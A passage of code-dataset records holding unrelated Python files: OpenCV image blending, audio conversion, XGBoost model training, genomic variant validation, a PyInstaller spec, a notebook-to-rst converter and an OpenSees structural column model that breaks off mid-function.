http://docs.opencv.org/3.1.0/d7/d4d/tutorial_py_thresholding.html#gsc.tab=0\nmask_inv = cv2.bitwise_not(mask)\n\n# Now black-out the area of logo in ROI\nimg1_bg = cv2.bitwise_and(roi,roi,mask = mask_inv)\n#cv2.imshow('mask',img1_bg)\n#cv2.waitKey(0)\n#cv2.destroyAllWindows()\n\n# Take only region of logo from logo image.\nimg2_fg = cv2.bitwise_and(img2,img3,mask = mask)\n#cv2.imshow('foreground',img2_fg)\n#cv2.waitKey(0)\n#cv2.destroyAllWindows()\n\n# Put logo in ROI and modify the main image\ndst = cv2.add(img1_bg,img2_fg)\nimg1[0:rows, 0:cols ] = dst\n\ncv2.imshow('res',img1)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n","sub_path":"02 Core Operations/Arithmetic Operations on Images/Core-Airth2.py","file_name":"Core-Airth2.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"87018093","text":"from moviepy.editor import *\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport struct\n\nf = open(\"out1.pcm\",'wb')\n\nname = \"VID_20200708_155406_00_026.insv\"\nv = VideoFileClip(name)\na = v.audio.to_soundarray()\n\n# a = AudioFileClip(\"shouji2.mp3\").to_soundarray();\n\na = a[:,1]\nb = []\nr = 44100/8000\nt = len(a)/44100\nfor i in range(int(8000*t)):\n\tb.append(a[int(i*r)])\nb = np.array(b) * 32000\nprint(max(b))\nf.write(b.astype('int16').tostring())\nf.close()\n\n# os.system(\"amodem recv -i out.pcm -o data.rx\")\n# f = open(\"data.rx\", \"rb\")\n# for i in range(5):\n# \tb = f.read(8)\n# \tt = struct.unpack('d', b)\n# \tprint(t)\n# f.close()\n# times = np.arange(len(a))/float(44100)\n# plt.fill_between(times, a[:,0])\n# plt.show()","sub_path":"read_sound.py","file_name":"read_sound.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"86483854","text":"\nclass NewPerson():\n def __init__(self, first_name, last_name, phone_number, email, role) -> None:\n self.first_name = first_name\n self.last_name = last_name\n self.phone_number = phone_number\n self.email = email\n self.role = role\n \n @staticmethod\n def from_json(data):\n return NewPerson(\n first_name = data.get('first_name'),\n last_name = data.get('last_name'),\n phone_number= data.get('phone_number'),\n email = data.get('email'),\n role = data.get('role'),\n )\n \nclass Person():\n def __init__(self, first_name, last_name, phone_number, email, role, created_at, updated_at) -> None:\n self.first_name = first_name\n self.last_name = last_name\n self.phone_number = phone_number\n self.email = email\n self.role = role\n self.created_at = created_at\n self.updated_at = updated_at\n \n @staticmethod\n def from_grpc_response(response):\n return Person(\n first_name = response.first_name,\n last_name = response.last_name,\n phone_number= response.phone_number,\n email = response.email,\n role = response.role,\n updated_at = response.updated_at,\n created_at = response.created_at\n )\n \n @staticmethod\n def from_grpc_response_list(response):\n person_list = []\n for person in response.person_list:\n person_list.append(Person.from_grpc_response(person).__dict__)\n return person_list\n \n\n \n","sub_path":"gateway/src/entities/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"634704700","text":"# BFS with early return\nclass Solution:\n def closestMeetingNode(self, edges: List[int], node1: int, 
node2: int) -> int:\n        visited1, visited2 = set([node1]), set([node2])\n        q1, q2, common = [node1], [node2], []\n        def bfs(q, visited, visited2):\n            child = []\n            while q:\n                node = q.pop()\n                if node in visited2:\n                    common.append(node)\n                if edges[node] != -1 and edges[node] not in visited:\n                    visited.add(edges[node])\n                    child.append(edges[node])\n            return child\n        while q1 and q2:\n            q1, q2 = bfs(q1, visited1, visited2), bfs(q2, visited2, visited1)\n            if common: return min(common)\n            # if only q2 still has a frontier, swap it in so the drain loop below walks it\n            if q2: q1, visited1, visited2 = q2, visited2, visited1\n        while q1:\n            q1 = bfs(q1, visited1, visited2)\n            if common: return min(common)\n        return -1","sub_path":"2359. Find Closest Node to Given Two Nodes.py","file_name":"2359. Find Closest Node to Given Two Nodes.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"495544114","text":"import os, sys\nimport pandas as pd\nimport numpy as np\nimport time\nimport csv\n\nfrom sklearn.metrics import confusion_matrix\nimport dill as pickle\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef get_cm(y_true, y_pred):\n    ind=np.isfinite(y_true.astype(float))\n    return confusion_matrix(y_true[ind].astype(np.int32), y_pred[ind])\n\ndef get_sn_sp(cm):\n    tn, fp, fn, tp = cm.ravel()\n    sn = float(tp)/(tp+fn)\n    sp = float(tn)/(tn+fp)\n    return sn, sp\n\ndef get_qual_model_score(sn_train, sp_train, sn_test, sp_test):\n    ba_train = (sn_train+sp_train)/2.\n    ba_test = (sn_test+sp_test)/2.\n    gof = (0.7*ba_train) + 0.3*(1-np.abs(sn_train-sp_train))\n    pred = (0.7*ba_test) + 0.3*(1-np.abs(sn_test-sp_test))\n    rob = 1-np.abs(ba_train-ba_test)\n    s = (0.3*gof) + (0.45*pred) + (0.25*rob)\n    return s\n\ndef file_updater(file_path, rows, mode='a'):\n\twith open(file_path, mode, newline='', encoding='utf-8') as f:\n\t\twriter=csv.writer(f)\n\t\tfor row in rows:\n\t\t\twriter.writerow(row)\n\nif __name__ == "__main__":\n\tload_folder = "data"\n\tscripts_folder = "Scripts"\n\tsys.path.append(scripts_folder)\n\n\tfrom AOTexperiment_helper import load_data, data_scaling\n\n\tfrom sklearn.metrics import confusion_matrix\n\tfrom sklearn.utils.class_weight import compute_sample_weight\n\tfrom tensorflow.keras.utils import to_categorical\n\n\timport xgboost as xgb\n\n\tdata_dict = load_data("data")\n\ttrain_features = data_dict['train_features']\n\ttest_features = data_dict['test_features']\n\ttrain_targets = data_dict['train_targets']\n\ttest_targets = data_dict['test_targets']\n\ttrain_Fweights = data_dict['train_Fweights']\n\ttest_Fweights = data_dict['test_Fweights']\n\tlabels = data_dict['labels']\n\n\tfeature_scaler = StandardScaler()\n\ttarget_scaler = None\n\tbinary_labels = [0,1]\n\ttrain_features_scaled, test_features_scaled, train_targets_scaled, test_targets_scaled, feature_scaler, target_scaler = data_scaling(\n\t\tfeature_scaler,\n\t\ttarget_scaler, \n\t    train_features, \n\t    test_features, \n        train_targets[:, binary_labels].astype(np.float32),\n        test_targets[:, binary_labels].astype(np.float32)   \n    )\t\n\n\twith open("AOT_binary_xgb_params_optimizer.ob", 'rb') as f:\n\t\tparams=pickle.load(f)\n\tparams= params['x']\n\n\tlearning_rate = params[0] \n\tn_estimators = params[1] \n\tmax_depth = params[2]\n\tmin_child_weight = params[3]\n\tgamma = params[4]\n\tsubsample = params[5]\n\tcolsample_bytree = params[6]\n\n\tsuper_folder = "AOT_models"\n\tfolder_name = "_".join([time.strftime("%y%m%d", 
time.localtime()),\n\t\t\t\t\t\t\t\"xgboost\",\n\t\t\t\t\t\t\t\"binary\"]\n\t\t\t\t\t\t )\n\tsummary_csv_path = os.path.join(super_folder,\n\t\t\t\t\t\t\t\t\tfolder_name+\"_summary.csv\"\n\t\t\t\t\t\t\t\t\t)\t\n\theader = [\"Model\", \"Label\", \"Metric\", \"Type\", \"Score\"]\n\tfile_updater(summary_csv_path, [header], mode='w')\n\ttry: \n\t\tos.mkdir(os.path.join(super_folder, folder_name))\n\texcept:\n\t\tpass\n\t\t\n\tfor idx, label_idx in enumerate(binary_labels):\n\t\tprint(f\"Starting on {labels[label_idx]}\")\n\t\tvalid_train_ind = np.where(~np.isnan(train_targets_scaled[:,idx]))[0]\n\t\tvalid_test_ind = np.where(~np.isnan(test_targets_scaled[:, idx]))[0]\n\n\t\ty_train = train_targets_scaled[valid_train_ind, idx]\n\t\ty_test = test_targets_scaled[valid_test_ind, idx] \t\n\n\t\ttrain_sample_weight = compute_sample_weight(\"balanced\", y_train)\n\n\t\trgs = xgb.XGBClassifier(\n\t\t\tlearning_rate = learning_rate, \n\t\t\tn_estimators = n_estimators, \n\t\t\tmax_depth=max_depth,\n\t\t\tmin_child_weight=min_child_weight,\n\t\t\tgamma=gamma,\n\t\t\tsubsample=subsample,\n\t\t\tcolsample_bytree=colsample_bytree,\n\t\t\tobjective=\"reg:logistic\",\n\t\t\tn_jobs=-1, \n\t\t\t)\n\t\trgs.fit(train_features_scaled[valid_train_ind], \n\t\t\t\ty_train,\n\t\t\t\tsample_weight = train_sample_weight)\n\t\trgs.save_model(os.path.join(super_folder, folder_name, f\"xgb_model_{labels[label_idx]}\"))\n\n\t\tr = []\n\n\t\ttrain_predict = rgs.predict(train_features_scaled[valid_train_ind])\n\t\t# train_predict = to_categorical(train_predict)\n\t\ttest_predict = rgs.predict(test_features_scaled[valid_test_ind], )\n\t\t# test_predict = to_categorical(test_predict)\n\n\t\t# categorical_y_train = to_categorical(y_train)\n\n\t\t# diff = categorical_y_train.shape[1]-train_predict.shape[1]\n\t\t# if diff>0:\n\t\t# train_predict = np.hstack([train_predict, np.zeros((train_predict.shape[0], diff))])\n\t\t# diff = categorical_y_train.shape[1]-test_predict.shape[1]\n\t\t# if diff>0:\n\t\t# test_predict=np.hstack([test_predict,np.zeros((test_predict.shape[0], diff))])\n\n\t\t# cm_train = get_cm(categorical_y_train, train_predict)\n\t\tcm_train = get_cm(y_train, train_predict)\n\n\t\tsn_train, sp_train = get_sn_sp(cm_train)\n\t\tprint(f\"Label {labels[label_idx]}: train NER={np.mean([sn_train, sp_train]):.3f}, train Sensitivity={sn_train:.3f}, train Specificity={sp_train:.3f}.\")\n\t\tr.append([\"xgboost\", labels[label_idx], \"NER\", \"Train\", np.mean([sn_train, sp_train])])\n\t\tr.append([\"xgboost\", labels[label_idx], \"Sensitivity\", \"Train\", sn_train])\n\t\tr.append([\"xgboost\", labels[label_idx], \"Specificity\", \"Train\", sp_train])\n\n\t\t# cm_test = get_cm(to_categorical(y_test), test_predict)\n\t\tcm_test = get_cm(y_test, test_predict)\n\n\t\tsn_test, sp_test = get_sn_sp(cm_test)\n\t\tprint(f\"Label {labels[label_idx]}: test NER={np.mean([sn_test, sp_test]):.3f}, test Sensitivity={sn_test:.3f}, test Specificity={sp_test:.3f}.\")\n\t\tr.append([\"xgboost\", labels[label_idx], \"NER\", \"Test\", np.mean([sn_test, sp_test])])\n\t\tr.append([\"xgboost\", labels[label_idx], \"Sensitivity\", \"Test\", sn_test])\n\t\tr.append([\"xgboost\", labels[label_idx], \"Specificity\", \"Test\", sp_test])\n\n\t\tmodel_score = get_qual_model_score(sn_train, sp_train, sn_test, sp_test)\n\t\tr.append([\"xgboost\", labels[label_idx], \"model score\", \"TrainTest\", model_score])\n\t\tprint(f\"Label{labels[label_idx]}: model score={model_score:.3f}\")\n\n\t\tfile_updater(summary_csv_path, r, 
mode='a')\n\tsys.exit()","sub_path":"1_Notebooks/AOT_wFP/AOT_binary_xgb.py","file_name":"AOT_binary_xgb.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"502633031","text":"#!/usr/bin/env python3\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport datetime as dt\nimport sys # args and exit\nimport re # match and remove ♀\nimport io # save plot to stream\nimport configparser # read google sheet url\n\n\ndef read_config(config_file=\"config.ini\"):\n config = configparser.ConfigParser()\n config.read(config_file)\n return(config)\n\n\ndef read_date(x):\n try:\n x = pd.to_datetime(x, format=\"%m/%d\")\n x = x.strftime(\"%m/%d\")\n except Exception:\n x = \"\"\n finally:\n return(x)\n\n\ndef game_roster(match_date, ngames=10, config_file=\"config.ini\"):\n \"\"\"\n 0. pull game roster from google sheets and clean it up a bit\n - remove junk rows (only take as many rows as there are games)\n - reformat date from m/d to mm/dd to match python's strftime\n 1. select only the row that matches the game date we provide\n \"\"\"\n gsheet = read_config(config_file)['roster']['tsv']\n df = pd.read_csv(gsheet, sep='\\t')[0:ngames]\n # make dates look like what python uses, so we can find game day\n # essentially just add 0 to 1 digit months\n df.loc[:, 'date'] = [read_date(x) for x in df.date]\n dayrow = df[df.date == match_date]\n\n return(dayrow)\n\n\ndef get_match_date(match_dow=6, week_offset=0):\n \"\"\"\n game_roster parsed google sheet encodes day like mm/dd\n find the next game day in mm/dd format\n input is the day of the week we have a match\n \"\"\"\n # when is our game (thursday=3)\n cur_dow = dt.datetime.now().weekday()\n days_to_match = match_dow-cur_dow if cur_dow <= match_dow else 7 - (cur_dow - match_dow)\n match_day_search_fmt = (dt.datetime.now() + dt.timedelta(days=days_to_match + 7*week_offset)).strftime(\"%m/%d\")\n return(match_day_search_fmt)\n\n\ndef dayrow_extract(dayrow):\n \"\"\"\n extract list of females (f), list of males (m), and total needed from dayrow\n - find the columns greater than 0, skip the first 6 columns\n - use that to get the number of players\n \"\"\"\n ignr = 4 # zero-based count of non-yes/no player cols (to ignore)\n players = dayrow.columns[\n [False]*ignr +\n (dayrow.iloc[:, ignr:] > 0).values.tolist()[0]\n ]\n # gals match '♀' in name\n gals = [not re.search('♀', x) is None for x in players]\n m = players[[not x for x in gals]]\n f = [re.sub(' *♀', '', x) for x in players[gals]]\n\n # size like 8v8, extract the first char (8) and make an int\n # need_n = int(dayrow['size'].values[0][0]) # 20180911 -- PSL all same size\n need_n = 7\n return({'f': f, 'm': m, 'need_n': need_n})\n\n\ndef draw_names(v, offset=0, color='black', adj=0):\n text_offset = .1 # how far to shift text over\n x = 1 # all on the vert pos.\n for i, n in enumerate(v):\n plt.text(x-text_offset, i+.2+offset,\n \"%d. %s\" % (i+1+offset-adj, n), color=color)\n\n\ndef plot_players(f, m, need_n):\n width = .3\n total = len(m) + len(f) # == dayrow.TOTAL.values[0]\n # cut posible range into colors red (too few), yellow (enough), green (have subs)\n fcolor = pd.cut([len(f)], [-pd.np.Inf,1,2,pd.np.Inf],labels=['red','yellow','green'])[0]\n mcolor = pd.cut([len(m)], [-pd.np.Inf,need_n-max(2,len(f))-1,need_n,pd.np.Inf],labels=['red','yellow','green'])[0]\n fig = plt.figure()\n\n # gap between m and f\n f_offset = len(m) + 1\n\n # color histogram. 
give .2 extra so empty will show (as red)\n plt.bar(1, len(m)+.2, width, color=mcolor)\n plt.bar(1, len(f)+.2, width, f_offset, color=fcolor)\n # show 2 above how many we have\n plt.ylim([-.2, total+2])\n # only show one x position\n plt.xlim([.5, 1.5])\n plt.axis('off')\n # place enumerated names on the bar\n draw_names(m, 0, 'black', 0)\n draw_names(f, f_offset, 'black', 1)\n #\n title = \"\\n\" +\\\n r'$\\frac{%d}{%d}$ = $\\frac{%d}{2}$♀ + $\\frac{%d}{%d}$♂ ' %\\\n (total, need_n, len(f), len(m), need_n - max(2, len(f)))\n plt.title(title, fontsize=20)\n fig.suptitle(\"as of \" + dt.datetime.now().strftime('%m/%d %H:%M'),\n fontsize=10)\n return(fig)\n\n\ndef stream_plot(fig):\n fig.tight_layout()\n imgdata = io.BytesIO()\n fig.savefig(imgdata, format='png')\n imgdata.seek(0)\n return(imgdata.read())\n\n\ndef most_recent_image():\n \"\"\"\n stdout buff wrie put it all together\n \"\"\"\n match_date = get_match_date()\n dayrow = game_roster(match_date)\n fig = plot_players(**dayrow_extract(dayrow))\n return(stream_plot(fig))\n\n\nif __name__ == \"__main__\":\n if(len(sys.argv) < 2):\n match_date = get_match_date()\n else:\n match_date = sys.argv[1]\n\n dayrow = game_roster(match_date)\n\n # error if we did not find exacltly one match\n if len(dayrow) != 1:\n print(\"did a bad job uniquely matching %s\" % match_date)\n sys.exit(1)\n\n fig = plot_players(**dayrow_extract(dayrow))\n sys.stdout.buffer.write(stream_plot(fig))\n","sub_path":"soccerimg.py","file_name":"soccerimg.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"398430723","text":"\"\"\"Module for Validation.\"\"\"\nfrom typing import List, Optional\n\nfrom ga4gh.vrsatile.pydantic.vrs_models import CopyChange\nfrom ga4gh.vrs.extras.translator import Translator\nfrom gene.query import QueryHandler as GeneQueryHandler\nfrom cool_seq_tool.data_sources import TranscriptMappings, SeqRepoAccess, UTADatabase, \\\n MANETranscript\n\nfrom variation.schemas.normalize_response_schema\\\n import HGVSDupDelMode as HGVSDupDelModeEnum\nfrom variation.vrs_representation import VRSRepresentation\nfrom variation.schemas.app_schemas import Endpoint\nfrom variation.schemas.validation_response_schema import ValidationSummary\nfrom variation.schemas.classification_response_schema import Classification\nfrom variation.tokenizers import GeneSymbol\nfrom .protein_substitution import ProteinSubstitution\nfrom .polypeptide_truncation import PolypeptideTruncation\nfrom .silent_mutation import SilentMutation\nfrom .coding_dna_substitution import CodingDNASubstitution\nfrom .coding_dna_silent_mutation import CodingDNASilentMutation\nfrom .genomic_silent_mutation import GenomicSilentMutation\nfrom .genomic_substitution import GenomicSubstitution\nfrom .protein_delins import ProteinDelIns\nfrom .coding_dna_delins import CodingDNADelIns\nfrom .genomic_delins import GenomicDelIns\nfrom .protein_deletion import ProteinDeletion\nfrom .coding_dna_deletion import CodingDNADeletion\nfrom .genomic_deletion import GenomicDeletion\nfrom .protein_insertion import ProteinInsertion\nfrom .coding_dna_insertion import CodingDNAInsertion\nfrom .genomic_insertion import GenomicInsertion\nfrom .genomic_uncertain_deletion import GenomicUncertainDeletion\nfrom .genomic_duplication import GenomicDuplication\nfrom .genomic_deletion_range import GenomicDeletionRange\nfrom .amplification import Amplification\n\n\nclass Validate:\n \"\"\"The validation class.\"\"\"\n\n def 
__init__(self, seqrepo_access: SeqRepoAccess,\n transcript_mappings: TranscriptMappings,\n gene_symbol: GeneSymbol,\n mane_transcript: MANETranscript,\n uta: UTADatabase, tlr: Translator,\n gene_normalizer: GeneQueryHandler, vrs: VRSRepresentation) -> None:\n \"\"\"Initialize the validate class.\n\n :param SeqRepoAccess seqrepo_access: Access to SeqRepo data\n :param TranscriptMappings transcript_mappings: Access to transcript\n mappings\n :param GeneSymbol gene_symbol: Gene symbol tokenizer\n :param MANETranscript mane_transcript: Access MANE Transcript\n information\n :param UTADatabase uta: Access to UTA queries\n :param Translator tlr: Class for translating nomenclatures to and from VRS\n :param GeneQueryHandler gene_normalizer: Access to gene-normalizer\n :param VRSRepresentation vrs: Class for representing VRS objects\n \"\"\"\n params = [\n seqrepo_access, transcript_mappings, gene_symbol,\n mane_transcript, uta, tlr, gene_normalizer, vrs\n ]\n self.validators = [\n ProteinSubstitution(*params),\n PolypeptideTruncation(*params),\n SilentMutation(*params),\n CodingDNASubstitution(*params),\n GenomicSubstitution(*params),\n CodingDNASilentMutation(*params),\n GenomicSilentMutation(*params),\n ProteinDelIns(*params),\n CodingDNADelIns(*params),\n GenomicDelIns(*params),\n ProteinDeletion(*params),\n CodingDNADeletion(*params),\n GenomicDeletion(*params),\n ProteinInsertion(*params),\n CodingDNAInsertion(*params),\n GenomicInsertion(*params),\n GenomicDeletionRange(*params),\n GenomicUncertainDeletion(*params),\n GenomicDuplication(*params),\n Amplification(*params)\n ]\n\n async def perform(\n self, classifications: List[Classification],\n endpoint_name: Optional[Endpoint] = None, warnings: List = None,\n hgvs_dup_del_mode: HGVSDupDelModeEnum = HGVSDupDelModeEnum.DEFAULT,\n baseline_copies: Optional[int] = None,\n copy_change: Optional[CopyChange] = None,\n do_liftover: bool = False\n ) -> ValidationSummary:\n \"\"\"Validate a list of classifications.\n\n :param List classifications: List of classifications\n :param Optional[Endpoint] endpoint_name: Then name of the endpoint being used\n :param List warnings: List of warnings\n :param HGVSDupDelModeEnum hgvs_dup_del_mode: Must be: `default`,\n `copy_number_count`, `copy_number_change`, `repeated_seq_expr`,\n `literal_seq_expr`. 
This parameter determines how to represent HGVS dup/del\n expressions as VRS objects.\n :param Optional[int] baseline_copies: Baseline copies number\n :param Optional[CopyChange] copy_change: The copy change\n :param bool do_liftover: Whether or not to liftover to GRCh38 assembly\n :return: ValidationSummary containing valid and invalid results\n \"\"\"\n valid_possibilities = list()\n invalid_possibilities = list()\n if not warnings:\n warnings = list()\n\n found_valid_result = False\n invalid_classifications = set()\n for classification in classifications:\n for validator in self.validators:\n if validator.validates_classification_type(\n classification.classification_type):\n results = await validator.validate(\n classification, hgvs_dup_del_mode=hgvs_dup_del_mode,\n endpoint_name=endpoint_name, baseline_copies=baseline_copies,\n copy_change=copy_change,\n do_liftover=do_liftover)\n for res in results:\n if res.is_valid:\n found_valid_result = True\n valid_possibilities.append(res)\n else:\n invalid_possibilities.append(res)\n invalid_classifications.add(\n classification.classification_type.value)\n\n if found_valid_result:\n break\n\n if not found_valid_result and not warnings:\n warnings.append(f\"Unable to find valid result for classifications: \"\n f\"{invalid_classifications}\")\n\n return ValidationSummary(\n valid_results=valid_possibilities,\n invalid_results=invalid_possibilities,\n warnings=warnings\n )\n","sub_path":"variation/validators/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":6634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"292820579","text":"# -*- mode: python ; coding: utf-8 -*-\n\nblock_cipher = None\n\noptions = [ ('v', None, 'OPTION')]\na = Analysis(['AcademicTime.py', 'AppliedSeriesChoicePage.py', 'Course.py', 'CourseSelectPage.py', 'InterestSelectPage.py', 'MajorSelectPage.py', 'MultiPageApp.py', 'ScheduleBlock.py', 'ScheduleDisplayPage.py', 'Schedule.py', 'Student.py'],\n pathex=['C:\\\\Users\\\\gabri\\\\PycharmProjects\\\\ScheduleBotPy'],\n binaries=[],\n datas=[('database/*', 'database')],\n hiddenimports=['psycopg2'],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n [],\n name='ScheduleBotWINDOWS',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n upx_exclude=[],\n runtime_tmpdir=None,\n console=False )\n","sub_path":"ScheduleBotWINDOWS.spec","file_name":"ScheduleBotWINDOWS.spec","file_ext":"spec","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"190993604","text":"#!/usr/bin/env python\n# Version 0.04 for Pandoc\n\n\"\"\"A simple python script that removes spaces before and \nafter dollar signs in inline Latex code inside .ipynb files\nand also produce a .rst file from the new .ipynb file by Using `Pandoc`\n\"\"\"\n\nimport os\nimport sys\nimport argparse # clear\nimport re\n\ndef main(arguments):\n\n parser = argparse.ArgumentParser(\n description=__doc__, # text to display before the argument help\n formatter_class=argparse.RawDescriptionHelpFormatter) \n parser.add_argument('infile', help=\"Input file\", type=argparse.FileType('r'))\n parser.add_argument('-m', '--median', help=\"Intermediate Output file\",\n 
default=sys.stdout, type=argparse.FileType('w+'))\n parser.add_argument('-o', '--outfile', help=\"Output file\",\n default=sys.stdout, type=argparse.FileType('w+'))\n args = parser.parse_args(arguments)\n #improve navigation and error catching to file in case user includes directory not in home of file\n with args.infile as f:\n content=f.read()\n with args.median as new_f:\n new_content=content\n new_content=re.sub(r'(\\$.*)\\s(\\$)',r'\\1\\2', new_content)\n new_content=re.sub(r'(\\$)\\s(.*\\$)',r'\\1\\2', new_content)\n new_f.write(new_content)\n os.system('pandoc -f ipynb -t rst %s -o %s' % (args.median.name, args.outfile.name))\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","sub_path":"i2r_p.py","file_name":"i2r_p.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"602801816","text":"import openseespy.opensees as ops\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom openseespy.postprocessing.Get_Rendering import plot_model\nfrom PIL import Image\nimport matplotlib.image as mpimg\nimport os\nfrom pathlib import Path\n\n\nclass Tanaka_Park():\n\n \n FC=27200\n REC=0.028 \n SUP_INF=4\n DER_INF=5\n E_ELASTIC=200000000\n\n #RECODERS\n FILE_DESPLAZAMIENTO = \"DESPLAZAMIENTO_1.out\" # DESPLAZAMIENTO\n FILE_REAC_BASE = \"REAC_BASE.out\" # REACCION_BASE\n FILE_INTER_ENS = \"INTERSECCION_ENSA_FISI.out\" # INTERSECCION DE COMPARACION DE LOS ENSAYOS REALIZADOS\n\n def __init__(self,nombre='BasicBuilder',numero_dimensiones=2, numero_dots=3, data_file='Tanaka and Park 1990, Nº5.txt', altura_columna=2.335, tipo_concreto=1, tipo_refuerzo=2 ,dim_travs_colum_altura=0.55, dim_trav_colum_base=0.55, data_file_lab='Tanaka_Park.txt', calculo='*'):\n \n self.nombre = nombre\n self.numero_dimensiones = numero_dimensiones\n self.numero_dots = numero_dots \n self.data_file = data_file\n self.tipo_concreto = tipo_concreto\n self.tipo_refuerzo = tipo_refuerzo\n\n #Datos de la Estructura\n self.altura_columna = altura_columna \n self.dim_travs_colum_altura = dim_travs_colum_altura\n self.dim_trav_colum_base = dim_trav_colum_base\n self.data_file_lab = data_file_lab\n self.data_file_lab = data_file_lab\n self.calculo = calculo\n \n ops.wipe()\n ops.model(self.nombre, \"-ndm\", self.numero_dimensiones, \"-ndf\", self.numero_dots)\n\n def construir_modelo(self):\n \n fc=32000\n fyu_01=429000\n fyu=675000\n rec=0.04\n dia_estr=0.012\n Esp_estr=0.11\n nvsx=2\n nvsy=2\n dia_varcol=20 #int(input(\"Ingrese el diametro de la varilla de refuerzo para la columna: \"))\n var_sup_inf=4\n var_der_izq=4\n areaFiber=((np.pi*dia_varcol**2)/4)/1000**2\n\n #Definir los nodos de la estructura\n ops.node(1, 0, 0)\n ops.node(2, 0, 1.65)\n\n #Restricciones \n ops.fix(1, 1, 1, 1)\n\n # Definir los materiales para la columna\n # ------------------------------------------\n # CONCRET0 \n \n if self.tipo_concreto == 1:\n # Concreto no confinado\n fpc=-fc\n epsc0=-0.002\n fpcu=0.8*fc\n epsU=-0.004\n ops.uniaxialMaterial(\"Concrete01\", 2 , -fpc , -epsc0 , -fpcu , -epsU)\n\n #Concreto Confinado\n esm=1\n Ec=(4700*(fc/1000)**0.5)*1000\n sp=Esp_estr-dia_estr\n rs=(nvsx*dia_estr**2*0.875*(self.dim_trav_colum_base-2*rec)+nvsy*dia_estr**2*0.875*(self.dim_travs_colum_altura-2*rec))/((self.dim_trav_colum_base-2*rec)*(self.dim_travs_colum_altura-2*rec)*Esp_estr)\n areaFiber=((np.pi*dia_varcol**2)/4)/1000**2\n area_conf=(self.dim_trav_colum_base-2*rec)*(self.dim_travs_colum_altura-2*rec)\n 
rcc=areaFiber*(2*var_sup_inf+2*var_der_izq)/area_conf\n wi=0.2\n ke=((1-wi**2/(6*area_conf))*(1-Esp_estr/(2*self.dim_trav_colum_base))*(1-Esp_estr/(2*self.dim_travs_colum_altura)))/(1-rcc)\n fpl=1/2*ke*rs*fyu_01\n fpcc=(-1.254+2.254*(1+7.94*fpl/fc)**0.5-2*fpl/fc)*fc\n ecc=epsc0*(1+5*(fpcc/fc-1))\n Esec=fpcc/ecc\n r=Ec/(Ec-Esec)\n ecu=1.5*(0.004+1.4*rs*fyu_01*esm/fpcc)\n fcu=0.8*fpcc\n ops.uniaxialMaterial(\"Concrete01\", 1, -fpcc , -ecc , -fcu , -ecu)\n\n elif self.tipo_concreto == 2:\n # Concreto inconfinado\n fpc=-fc\n epsc0=-0.003\n fpcu=0.8*fc\n epsU=-0.006\n lambdaC=0.5\n ft=(0.62*(fc)**0.5)\n Ets=0.1*(2*(fc)/epsc0)\n\n ops.uniaxialMaterial(\"Concrete02\", 2 , -fc , epsc0 , fpcu , epsU , lambdaC , ft , Ets)\n\n # Concreto confinado\n\n #Columnas\n\n fcc=1.35*fc\n epscc0=-0.003\n fpccu=0.8*fc\n epscU=-0.006\n\n ops.uniaxialMaterial(\"Concrete02\", 1 , -fcc , epscc0 , fpccu , epscU , lambdaC , ft , Ets)\n \n elif self.tipo_concreto == 3:\n # Concreto inconfinado\n fpc=-fc\n epsc0=-0.003\n fpcu=0.8*fc\n epsU=-0.006\n endStrainSITC=0.03\n\n ops.uniaxialMaterial(\"Concrete01WithSITC\", 2 , -fc , epsc0 , fpcu , epsU, endStrainSITC)\n\n # Concreto confinado\n\n #Columnas\n\n fcc=-1.35*fc\n epsc0=-0.003\n fpcu=0.8*fc\n epsU=-0.006\n endStrainSITC=0.03\n\n ops.uniaxialMaterial(\"Concrete01WithSITC\", 1 , -fcc , epsc0 , fpcu , epsU , endStrainSITC)\n \n else:\n \n print(\"No se encontro el concreto a utilizar\")\n\n #Material Elástico del Concreto\n E_elastic=20000000\n ops.uniaxialMaterial(\"Elastic\", 3, E_elastic)\n\n #Acero de refuerzo\n \n if self.tipo_refuerzo==1:\n Fy=511000\n Fyu=fyu\n E0=200000000\n b=0.0179\n ops.uniaxialMaterial(\"Steel01\", 4, Fy, E0, b)\n \n elif self.tipo_refuerzo==2:\n Fy=511000\n Fyu=fyu\n E0=200000000\n b=0.0179\n R0=15\n cR1=0.925\n cR2=0.15\n a1=0\n a2=1\n a3=0\n a4=1\n ops.uniaxialMaterial(\"Steel02\", 4, Fy, E0, b, R0, cR1, cR2, a1, a2, a3, a4)\n\n else: \n print(\"No se encontro el acero de refuerzo a utilizar\")\n\n #Definir las etiquetas de secciones\n col_sec=1\n\n #Creacion de las secciones\n ops.section(\"Fiber\", col_sec)\n\n y0=(self.dim_travs_colum_altura/2)-rec\n 